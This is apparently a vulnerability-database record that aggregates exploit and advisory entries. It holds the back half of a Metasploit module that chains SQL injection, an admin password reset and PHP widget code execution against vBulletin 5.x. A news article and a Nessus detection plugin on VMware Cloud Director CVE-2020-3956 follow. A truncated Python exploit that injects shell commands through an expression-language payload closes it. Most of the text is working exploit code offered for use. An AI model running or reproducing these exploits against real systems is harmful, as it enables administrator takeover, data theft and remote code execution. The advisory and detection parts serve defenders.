'regex', 'hvquestion', \"questionid = '#{questionid}'\")\n\n if questionid.nil?\n return nil\n end\n\n print_good(\"Retrieved the answer '#{hv_answer}' (REGEX) to the HV question with id '#{questionid}'.\")\n hv_answer\n end\n\n # Gets the human verification (image based) answer\n def get_hv_answer(node_id, tbl_prfx, hv_hash)\n print_status(\"Using HV token '#{hv_hash}' and SQLinjection to determine HV answer.\")\n hv_answer = do_sqli(node_id, tbl_prfx, 'answer', 'humanverify', \"hash = '#{hv_hash}'\")\n\n if hv_answer.nil?\n return nil\n end\n\n print_good(\"Retrieved '#{hv_answer}' answer to HV token '#{hv_hash}'.\")\n hv_answer\n end\n\n # Gets the prefix to the SQL tables used in vbulletin install\n def get_table_prefix(node_id)\n print_status('Attempting to determine the vBulletin table prefix.')\n table_name = do_sqli(node_id, '', 'table_name', 'information_schema.columns', \"column_name='phrasegroup_cppermission'\")\n\n unless table_name && table_name.split('language').index\n fail_with(Failure::Unknown, 'Could not determine the vBulletin table prefix.')\n end\n\n tbl_prefix = table_name.split('language')[0]\n print_good(\"Sucessfully retrieved table to get prefix from #{table_name}.\")\n\n tbl_prefix\n end\n\n # Sends the request to begin forgot password request\n def begin_reset_pass(admin_email, hv_answer, hv_hash, type = 'Image')\n print_status(\"Making request to '#{target_uri.path}/auth/lostpw' to begin lost password process.\")\n if type == 'Question'\n hv_field_name1 = 'humanverify[input]'\n hv_field_name2 = 'humanverify[hash]'\n elsif type == 'Recaptcha2'\n hv_field_name1 = 'unused'\n hv_field_name2 = 'humanverify[g-recaptcha-response]'\n else\n hv_field_name1 = 'humanverify[input]'\n hv_field_name2 = 'humanverify[hash]'\n end\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'auth', 'lostpw'),\n 'vars_post' => {\n 'email' => admin_email.to_s,\n hv_field_name1.to_s => hv_answer.to_s,\n hv_field_name2.to_s => hv_hash.to_s,\n 'securitytoken' => 'guest'\n }\n })\n\n return false unless res && res.code == 200\n\n parsed_resp = res.get_json_document\n\n return false if parsed_resp['response'] && parsed_resp['response']['errors']\n\n true\n end\n\n # Attempts to login to vBulletin install\n def login(user, pass, type = '')\n print_status(\"Making login request to '#{target_uri.path}/auth/ajax-login' with username: '#{user}' and password: '#{pass}'.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'auth', 'ajax-login'),\n 'vars_post' => {\n 'logintype': type.to_s,\n 'username' => user.to_s,\n 'password' => pass.to_s,\n 'securitytoken' => 'guest'\n }\n })\n\n return [nil, nil] unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['success']\n\n print_good(\"Successfully logged in as #{user} #{type}.\")\n\n [res.get_cookies, parsed_resp['newtoken']]\n end\n\n # Gets an administrator's info from the database using SQLi\n def get_admin_info(node_id, tbl_prefix)\n uid = do_sqli(node_id, tbl_prefix, 'userid', 'administrator', nil)\n username = do_sqli(node_id, tbl_prefix, 'username', 'user', \"userid = '#{uid}'\")\n token = do_sqli(node_id, tbl_prefix, 'token', 'user', \"userid = '#{uid}'\")\n email = do_sqli(node_id, tbl_prefix, 'email', 'user', \"userid = '#{uid}'\")\n\n unless uid && username && token && email\n return [nil, nil, nil, nil]\n end\n\n [uid, username, token, email]\n end\n\n # Activates vBulletin site builder\n def activate_sitebuilder(pageid, nodeid, userid, sec_token, cookie_jar)\n print_status(\"Making request to '#{target_uri.path}/ajax/activate-sitebuilder' to activate site-builder functionality.\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'activate-sitebuilder'),\n 'cookie' => [cookie_jar],\n 'headers' => {\n 'X-Requested-With' => 'XMLHttpRequest'\n },\n 'vars_post' => {\n 'pageid' => pageid.to_s,\n 'nodeid' => nodeid.to_s,\n 'userid' => userid.to_s,\n 'loadMenu' => 'false',\n 'isAjaxTemplateRender' => 'true',\n 'isAjaxTemplateRenderWithData' => 'true',\n 'securitytoken' => sec_token.to_s\n }\n })\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']\n\n print_good('Successfully enabled site-builder functionality.')\n true\n end\n\n # Creates new widget instance\n def new_widget_instance(sec_token, cookie_jar)\n print_status(\"Making request to '#{target_uri.path}/ajax/api/widget/saveNewWidgetInstance' to create new widget.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'widget', 'saveNewWidgetInstance'),\n 'cookie' => [cookie_jar],\n 'vars_post' => {\n 'containerinstanceid' => '0',\n 'widgetid' => '23', # PHP widget type ID\n 'pagetemplateid' => '',\n 'securitytoken' => sec_token.to_s\n }\n })\n\n return [nil, nil] unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['widgetinstanceid']\n\n print_good('Created new widget instance.')\n\n [parsed_resp['widgetinstanceid'], parsed_resp['pagetemplateid']]\n end\n\n # Saves a new widget to vBulletin.\n def save_widget(pt_id, wi_id, payload, sec_token, cookie_jar)\n print_status(\"Making request to '#{target_uri.path}/ajax/api/widget/saveAdminConfig' to add payload to widget.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'widget', 'saveAdminConfig'),\n 'cookie' => [cookie_jar],\n 'vars_post' => {\n 'widgetid' => '23', # PHP widget type ID\n 'pagetemplateid' => pt_id.to_s,\n 'widgetinstanceid' => wi_id.to_s,\n 'data[widget_type]' => '',\n 'data[title]' => rand_text_alphanumeric(rand(6..16)),\n 'data[show_at_breakpoints][desktop]' => '1',\n 'data[show_at_breakpoints][small]' => '1',\n 'data[show_at_breakpoints][xsmall]' => '1',\n 'data[hide_title]' => '1',\n 'data[module_viewpermissions][key]' => 'show_all',\n 'data[code]' => payload.encoded.to_s,\n 'securitytoken' => sec_token.to_s\n }\n })\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']\n\n print_good('Successfully added payload to widget.')\n\n true\n end\n\n # Sends request to reset password using activation id.\n def reset_password(admin_uid, act_id, new_pass)\n print_status(\"Sending reset password request to '#{target_uri.path}/auth/reset-password'.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'auth', 'reset-password'),\n 'headers' => {\n 'X-Requested-With' => 'XMLHttpRequest'\n },\n 'vars_post' => {\n 'userid' => admin_uid.to_s,\n 'activationid' => act_id.to_s,\n 'new-password' => new_pass.to_s,\n 'new-password-confirm' => new_pass.to_s,\n 'securitytoken' => 'guest'\n }\n })\n\n unless res && res.code == 200 && res.body.to_s =~ /Logging in/\n return nil\n end\n\n print_good(\"User with userid '#{admin_uid}' successfully reset password to '#{new_pass}'.\")\n\n true\n end\n\n # Deletes a page in vbulletin\n def delete_page(pageid, login_token, cookie_jar)\n print_status(\"Sending delete page request to '#{target_uri.path}/ajax/api/page/delete'.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'page', 'delete'),\n 'cookie' => [cookie_jar],\n 'headers' => {\n 'X-Requested-With' => 'XMLHttpRequest'\n },\n 'vars_post' => {\n 'pageid' => pageid.to_s,\n 'securitytoken' => login_token.to_s\n }\n })\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']\n\n print_good(\"Successfully deleted page with pageid: #{pageid}\")\n\n true\n end\n\n # Makes request to execute PHP payload.\n def exec_payload(rest_url)\n print_status(\"Sending request to '#{normalize_uri(target_uri.path, rest_url)}' to execute payload.\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, rest_url)\n })\n\n unless res && res.code == 200\n return nil\n end\n\n print_good('Request made succesfully, payload should be executing now.')\n\n true\n end\n\n # Fetches a human verification question based on hash.\n def get_hv_question(hash)\n print_status(\"Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvQuestion' to get human verification question.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'fetchHvQuestion'),\n 'vars_post' => {\n 'hash' => hash.to_s\n }\n })\n\n unless res && res.code == 200 && res.body.to_s !~ /\"errors\"/\n return nil\n end\n\n res.body.to_s.tr('\"', '')\n end\n\n # Saves a new page to the vBulletin install\n def save_page(nodeid, userid, pt_id, payload_url, wi_id, session_info)\n print_status(\"Sending request to '#{target_uri.path}/admin/savepage' to save new page at '#{payload_url}'.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'savepage'),\n 'cookie' => [session_info[1]],\n 'vars_post' => {\n 'input[ishomeroute]' => '0',\n 'input[pageid]' => '0',\n 'input[nodeid]' => nodeid.to_s,\n 'input[userid]' => userid.to_s,\n 'input[screenlayoutid]' => '2',\n 'input[templatetitle]' => rand_text_alphanumeric(rand(5..10)),\n 'input[displaysections[0]]' => '[]',\n 'input[displaysections[1]]' => '[]',\n 'input[displaysections[2]]' => \"[{\\\"widgetId\\\":\\\"23\\\",\\\"widgetInstanceId\\\":\\\"#{wi_id}\\\"}]\",\n 'input[displaysections[3]]' => '[]',\n 'input[pagetitle]' => rand_text_alphanumeric(rand(5..10)),\n 'input[resturl]' => payload_url.to_s,\n 'input[metadescription]' => rand_text_alphanumeric(rand(5..10)),\n 'input[pagetemplateid]' => pt_id.to_s,\n 'url' => normalize_uri(target_uri.path),\n 'securitytoken' => session_info[0].to_s\n }\n })\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['success']\n\n print_good(\"Page succesfully created and should be accessible at '#{normalize_uri(target_uri.path, payload_url.to_s)}'.\")\n\n parsed_resp['pageid']\n end\n\n # Gets human verification type (options: \"Question\" | \"Image\" | Recaptcha2 | \"Disabled\")\n def get_hv_type\n\n print_status(\"Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvType' to get human verification type.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'fetchHvType')\n })\n\n unless res && res.code == 200\n return nil\n end\n\n hv_type = res.body.to_s.tr('\"', '')\n print_good(\"Retrieved HV/captcha type of '#{hv_type}'.\")\n\n hv_type.to_s.tr(\"'\", '')\n end\n\n # Brute force a nodeid (attack requires a valid nodeid)\n def brute_force_node\n min = datastore['MINNODE']\n max = datastore['MAXNODE']\n\n if min > max\n print_error(\"MINNODE can't be major than MAXNODE.\")\n return nil\n end\n\n for node_id in min..max\n if exists_node?(node_id)\n return node_id\n end\n end\n\n nil\n end\n\n # Checks if a nodeid is valid\n def exists_node?(id)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'node', 'getNode'),\n 'vars_post' => {\n 'nodeid' => id.to_s\n }\n })\n\n unless res && res.code == 200\n return nil\n end\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']\n\n print_good(\"Sucessfully found node at id #{id}\")\n true\n end\n\n # Gets a node through BF or user supplied value\n def get_node\n if datastore['NODE'].nil? || datastore['NODE'] <= 0\n print_status('Brute forcing to find a valid node id.')\n return brute_force_node\n end\n\n print_status(\"Checking node id '#{datastore['NODE']}'.\")\n return datastore['NODE'] if exists_node?(datastore['NODE'])\n\n nil\n end\n\n # Check function for exploit\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'js', 'login.js')\n })\n\n return CheckCode::Unknown unless res && res.code == 200\n\n return CheckCode::Safe if res.body.to_s =~ /vBulletin 5\\.6\\.1 Patch Level 1/\n\n if res.body.to_s =~ /vBulletin ([\\.0-9]+)/\n if Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('5.6.1')\n return CheckCode::Safe\n elsif Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('5.0.0')\n return CheckCode::Appears\n end\n\n return CheckCode::Detected\n end\n\n CheckCode::Safe\n end\n\n # Performs all exploit functionality\n def exploit\n super\n\n # Get node_id for requests\n node_id = get_node\n fail_with(Failure::Unknown, 'Could not get a valid node id for the vBulletin install.') unless node_id\n\n # Get vBulletin table prefix\n table_prfx = get_table_prefix(node_id)\n fail_with(Failure::UnexpectedReply, 'Could not determine the table prefix for the vBulletin install.') unless table_prfx\n\n # Get admin info (email, uid, token)\n admin_uid, admin_user, admin_token, admin_email = get_admin_info(node_id, table_prfx)\n unless admin_uid && admin_user && admin_token && admin_email\n fail_with(Failure::UnexpectedReply, 'Could not retrieve administrator uid, username, email and token.')\n end\n print_good(\"Retrieved administrator uid: #{admin_uid} user: #{admin_user} email: #{admin_email} and password: #{admin_token}\")\n\n if !datastore['MANUALLOSTPASS']\n # Determine HV type\n hv_type = get_hv_type\n\n fail_with(Failure::Unknown, 'Invalid human verification type, you must request a new password for the administrator manually (and set MANUALLOSTPASS).') unless ['Image', 'Question', 'Recaptcha2', 'Disabled'].include? hv_type\n\n fail_with(Failure::Unknown, \"Site uses Recaptcha2, retry with MANUALLOSTPASS enabled and after a lost password request to an administrator account (#{admin_email})\") unless ['Recaptcha2', 'Disabled'].exclude? hv_type\n\n # Generate HV token and get answer\n if hv_type == 'Image' && hv_type != 'Disabled'\n hv_hash = get_hv_hash\n hv_answer = get_hv_answer(node_id, table_prfx, hv_hash)\n fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification hash or answer.') unless hv_hash && hv_answer\n\n elsif hv_type == 'Question' && hv_type != 'Disabled'\n hv_hash = get_hv_hash\n fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question hash.') unless hv_hash\n\n ques_id = get_hv_answer(node_id, table_prfx, hv_hash)\n fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question id.') unless ques_id\n\n hv_question = get_hv_question(hv_hash)\n hv_answer = get_hv_ques_answer(node_id, table_prfx, ques_id)\n fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question or answer.') unless hv_question && hv_answer\n\n print_good(\"Retrieved the HV question '#{hv_question}' and answer '#{hv_answer}' (regex).\")\n end\n\n # Make request to forget my password\n brp_ret = begin_reset_pass(admin_email, hv_answer, hv_hash, hv_type)\n\n # We fail here when the answer to the HV question contains a complex regex or is recaptcha2\n fail_with(Failure::Unknown, 'Site requires captcha that we cannot bypass.') unless brp_ret\n end\n\n # Get Activation ID for forgot password request from DB\n activation_id = do_sqli(node_id, table_prfx, 'activationid', 'useractivation', \"userid = '#{admin_uid}'\")\n fail_with(Failure::UnexpectedReply, 'Could not retrieve activation id for forgot password request.') unless activation_id\n\n # Make request setting new password\n new_pass = rand_text_alphanumeric(rand(10..16))\n rp_ret = reset_password(admin_uid, activation_id, new_pass)\n fail_with(Failure::UnexpectedReply, \"Error attempting to reset password with activation id '#{activation_id}'.\") unless rp_ret\n\n # Login to vBulletin\n cookie_jar, login_token = login(admin_user, new_pass)\n fail_with(Failure::NoAccess, \"Could not login with username: '#{admin_user}' and password: '#{new_pass}'.\") unless login_token\n\n # Activate Site Builder (is this necessary?!)\n actsb_ret = activate_sitebuilder(1, node_id, admin_uid, login_token, cookie_jar)\n fail_with(Failure::UnexpectedReply, 'Could not activate site builder.') unless actsb_ret\n\n # Login to vBulletin\n cookie_jar, login_token = login(admin_user, new_pass, 'cplogin')\n fail_with(Failure::NoAccess, \"Could not login to CP with username: '#{admin_user}' and password: '#{new_pass}'.\") unless login_token\n\n # Create new widget\n wi_id, pt_id = new_widget_instance(login_token, cookie_jar)\n fail_with(Failure::UnexpectedReply, 'Could not create new widget instance.') unless wi_id && pt_id\n\n # Save modifications to widget\n sw_ret = save_widget(pt_id, wi_id, payload, login_token, cookie_jar)\n fail_with(Failure::UnexpectedReply, 'Could not save payload modifications into widget instance.') unless sw_ret\n\n # Add page with widget embedded\n payload_url = rand_text_alphanumeric(rand(6..10))\n session_info = [login_token, cookie_jar]\n page_id = save_page(node_id, admin_uid, pt_id, payload_url, wi_id, session_info)\n fail_with(Failure::UnexpectedReply, 'Could not save newly created page with malicious widget.') unless page_id\n\n # Execute php payload\n print_good(\"Executing PHP payload (#{payload.encoded.length} bytes) at #{normalize_uri(target_uri.path, payload_url)}.\")\n exec_payload(payload_url)\n\n # Delete page with widget embedded within it\n dp_ret = delete_page(page_id, login_token, cookie_jar)\n print_bad('Could not delete page (cleanup phase).') unless dp_ret\n end\n\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2020-06-02T06:22:01", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-oM49kfChIyw/XtXlb8omR8I/AAAAAAAAAZI/tCuWnQ2IM5gKM4dh6XXvG1i_5svyskb-QCLcBGAsYHQ/s728-e100/vmware-cloud-hacking.jpg>)\n\nCybersecurity researchers today disclosed details for a new vulnerability in VMware's Cloud Director platform that could potentially allow an attacker to gain access to sensitive information and control private clouds within an entire infrastructure. \n \nTracked as [CVE-2020-3956](<https://www.vmware.com/security/advisories/VMSA-2020-0010.html>), the code injection flaw stems from an improper input handling that could be abused by an authenticated attacker to send malicious traffic to Cloud Director, leading to the execution of arbitrary code. \n \nIt's rated 8.8 out of 10 on the CVSS v.3 vulnerability severity scale, making it a critical vulnerability. \n\n\n \nVMware [Cloud Director](<https://www.vmware.com/products/cloud-director.html>) is a popular deployment, automation, and management software that's used to operate and manage cloud resources, allowing businesses to data centers distributed across different geographical locations into virtual data centers. \n \nAccording to the company, the vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface, and API access. \n \nThe vulnerability impacts VMware Cloud Director versions 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4. \n \nThe vulnerability was identified by a Prague-based ethical hacking firm Citadelo after it was hired earlier this year by an unnamed Fortune 500 enterprise customer to carry out a security audit of its cloud infrastructure. \n \n\n\n \nIt has also published a [proof-of-concept](<https://github.com/aaronsvk/CVE-2020-3956/blob/master/exploit.py>) to demonstrate the exploit's severity. \n \n\"Everything started with just a simple anomaly. When we entered ${7*7} as a hostname for the SMTP server in vCloud Director, we received the following error message: **String value has an invalid format, value: [49]**,\" [Citadelo noted](<https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/>) in its report. \"It indicated some form of [Expression Language injection](<https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection>), as we were able to evaluate simple arithmetic functions on the server-side.\" \n \nUsing this as an entry point, the researchers said they were able to access arbitrary Java classes (e.g. \"[java.io.BufferedReader](<https://docs.oracle.com/javase/8/docs/api/java/io/BufferedReader.html>)\") and instantiate them by passing malicious payloads. \n\n\n \nCitadelo said it was able to perform the following the set of actions by exploiting the flaw: \n \n\n\n * View content of the internal system database, including password hashes of any customers allocated to this infrastructure.\n * Modify the system database to access foreign virtual machines (VM) assigned to different organizations within Cloud Director.\n * Escalate privileges from \"Organization Administrator\" to \"System Administrator\" with access to all cloud accounts by merely changing the password via an SQL query.\n * Modify the Cloud Director's login page, allowing the attacker to capture passwords of another customer in plaintext, including System Administrator accounts.\n * Read other sensitive data related to customers, like full names, email addresses, or IP addresses.\n \nAfter Citadelo privately disclosed the findings to VMware on April 1, the company patched the flaws in a series of updates spanning versions 9.1.0.4, 9.5.0.6, 9.7.0.5, and 10.0.0.2. \n \nVMware has also released a [workaround to mitigate](<https://kb.vmware.com/s/article/79091>) the risk of attacks exploiting the issue. \n \n\"In general, cloud infrastructure is considered relatively safe because different security layers are being implemented within its core, such as encryption, isolating of network traffic, or customer segmentations. However, security vulnerabilities can be found in any type of application, including the Cloud providers themselves,\" Tomas Zatko, CEO of Citadelo, said.\n", "modified": "2020-06-02T05:37:18", "published": "2020-06-02T04:00:00", "id": "THN:B363D9388FA707DF636CA4F8E0FC08BA", "href": "https://thehackernews.com/2020/06/vmware-cloud-director-exploit.html", "type": "thn", "title": "Critical VMware Cloud Director Flaw Lets Hackers Take Over Corporate Servers", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-05-31T21:25:57", "bulletinFamily": "scanner", "description": "The version of VMware vCloud Director installed on the remote host is 9.1.x prior to 9.1.0.4, 9.5.x prior to 9.5.0.6,\n9.7.x prior to 9.7.0.5, or 10.0.x prior to 10.0.0.2. It is, therefore, affected by a code injection vulnerability due to\na failure to properly handle input. A remote, authenticated actor can exploit this, by sending malicious traffic to\nVMWare Cloud Director, in order to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2020-05-21T00:00:00", "id": "VMWARE_CLOUD_DIRECTOR_VMSA-2020-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/136746", "published": "2020-05-21T00:00:00", "title": "VMware Cloud Director 9.1.x < 9.1.0.4 / 9.5.x < 9.5.0.6 / 9.7.x < 9.7.0.5 / 10.0.x < 10.0.0.2 Code Injection (VMSA-2020-0010)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136746);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/27\");\n\n script_cve_id(\"CVE-2020-3956\");\n script_xref(name:\"VMSA\", value:\"2020-0010\");\n script_xref(name:\"IAVA\", value:\"2020-A-0223\");\n\n script_name(english:\"VMware Cloud Director 9.1.x < 9.1.0.4 / 9.5.x < 9.5.0.6 / 9.7.x < 9.7.0.5 / 10.0.x < 10.0.0.2 Code Injection (VMSA-2020-0010)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization appliance installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCloud Director installed on the remote host is 9.1.x prior to 9.1.0.4, 9.5.x prior to 9.5.0.6,\n9.7.x prior to 9.7.0.5, or 10.0.x prior to 10.0.0.2. It is, therefore, affected by a code injection vulnerability due to\na failure to properly handle input. A remote, authenticated actor can exploit this, by sending malicious traffic to\nVMWare Cloud Director, in order to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2020-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCloud Director version 9.1.0.4 / 9.5.0.6 / 9.7.0.5 / 10.0.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3956\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcloud_director\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcloud_director_installed.nbin\");\n script_require_keys(\"Host/VMware vCloud Director/Version\", \"Host/VMware vCloud Director/Build\");\n\n exit(0);\n}\n\nversion = get_kb_item_or_exit(\"Host/VMware vCloud Director/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware vCloud Director/Build\");\n\nfixed_ver = '';\nfixed_build = '';\n\nif (version =~ \"^9\\.1\\.\")\n{\n fixed_ver = '9.1.0.4';\n fixed_build = '16217117';\n}\nelse if (version =~ \"^9\\.5\\.\")\n{\n fixed_ver = '9.5.0.6';\n fixed_build = '16181458';\n}\nelse if (version =~ \"^9\\.7\\.\")\n{\n fixed_ver = '9.7.0.5';\n fixed_build = '16081827';\n}\nelse if (version =~ \"^10\\.0\\.\")\n{\n fixed_ver = '10.0.0.2';\n fixed_build = '16081830';\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware Cloud Director', version + ' Build ' + build);\n\nif (\n (ver_compare(ver:version, fix:fixed_ver, strict:FALSE) < 0) &&\n (build < fixed_build)\n)\n{\n report = '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fixed_ver + ' Build ' + fixed_build +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware Cloud Director', version + ' Build ' + build);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-06-05T00:59:02", "bulletinFamily": "exploit", "description": "", "modified": "2020-06-04T00:00:00", "published": "2020-06-04T00:00:00", "id": "PACKETSTORM:157945", "href": "https://packetstormsecurity.com/files/157945/VMWare-vCloud-Director-9.7.0.15498291-Remote-Code-Execution.html", "title": "VMWare vCloud Director 9.7.0.15498291 Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution \n# Exploit Author: Tomas Melicher \n# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ \n# Date: 2020-05-24 \n# Vendor Homepage: https://www.vmware.com/ \n# Software Link: https://www.vmware.com/products/cloud-director.html \n# Tested On: vCloud Director 9.7.0.15498291 \n# Vulnerability Description: \n# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. \n \n#!/usr/bin/python \n \nimport argparse # pip install argparse \nimport base64, os, re, requests, sys \nif sys.version_info >= (3, 0): \nfrom urllib.parse import urlparse \nelse: \nfrom urlparse import urlparse \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \nPAYLOAD_TEMPLATE = \"${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}\" \nsession = requests.Session() \n \ndef login(url, username, password, verbose): \ntarget_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) \nres = session.get(target_url) \nmatch = re.search(r'tenant:([^\"]+)', res.content, re.IGNORECASE) \nif match: \ntenant = match.group(1) \nelse: \nprint('[!] can\\'t find tenant identifier') \nreturn \n \nif verbose: \nprint('[*] tenant: %s'%(tenant)) \n \nmatch = re.search(r'security_check\\?[^\"]+', res.content, re.IGNORECASE) \nif match: # Cloud Director 9.* \nlogin_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) \nres = session.post(login_url, data={'username':username,'password':password}) \nif res.status_code == 401: \nprint('[!] invalid credentials') \nreturn \nelse: # Cloud Director 10.* \nmatch = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) \nif match: \nlogin_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) \nheaders = { \n'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), \n'Accept': 'application/json;version=29.0', \n'Content-type': 'application/json;version=29.0' \n} \nres = session.post(login_url, headers=headers) \nif res.status_code == 401: \nprint('[!] invalid credentials') \nreturn \nelse: \nprint('[!] url for login form was not found') \nreturn \n \ncookies = session.cookies.get_dict() \njwt = cookies['vcloud_jwt'] \nsession_id = cookies['vcloud_session_id'] \n \nif verbose: \nprint('[*] jwt token: %s'%(jwt)) \nprint('[*] session_id: %s'%(session_id)) \n \nres = session.get(target_url) \nmatch = re.search(r'organization : \\'([^\\']+)', res.content, re.IGNORECASE) \nif match is None: \nprint('[!] organization not found') \nreturn \norganization = match.group(1) \nif verbose: \nprint('[*] organization name: %s'%(organization)) \n \nmatch = re.search(r'orgId : \\'([^\\']+)', res.content) \nif match is None: \nprint('[!] orgId not found') \nreturn \norg_id = match.group(1) \nif verbose: \nprint('[*] organization identifier: %s'%(org_id)) \n \nreturn (jwt,session_id,organization,org_id) \n \n \ndef exploit(url, username, password, command, verbose): \n(jwt,session_id,organization,org_id) = login(url, username, password, verbose) \n \nheaders = { \n'Accept': 'application/*+xml;version=29.0', \n'Authorization': 'Bearer %s'%jwt, \n'x-vcloud-authorization': session_id \n} \nadmin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) \nres = session.get(admin_url, headers=headers) \nmatch = re.search(r'<description>\\s*([^<\\s]+)', res.content, re.IGNORECASE) \nif match: \nversion = match.group(1) \nif verbose: \nprint('[*] detected version of Cloud Director: %s'%(version)) \nelse: \nversion = None \nprint('[!] can\\'t find version of Cloud Director, assuming it is more than 10.0') \n \nemail_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) \n \npayload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) \ndata = '<root:OrgEmailSettings 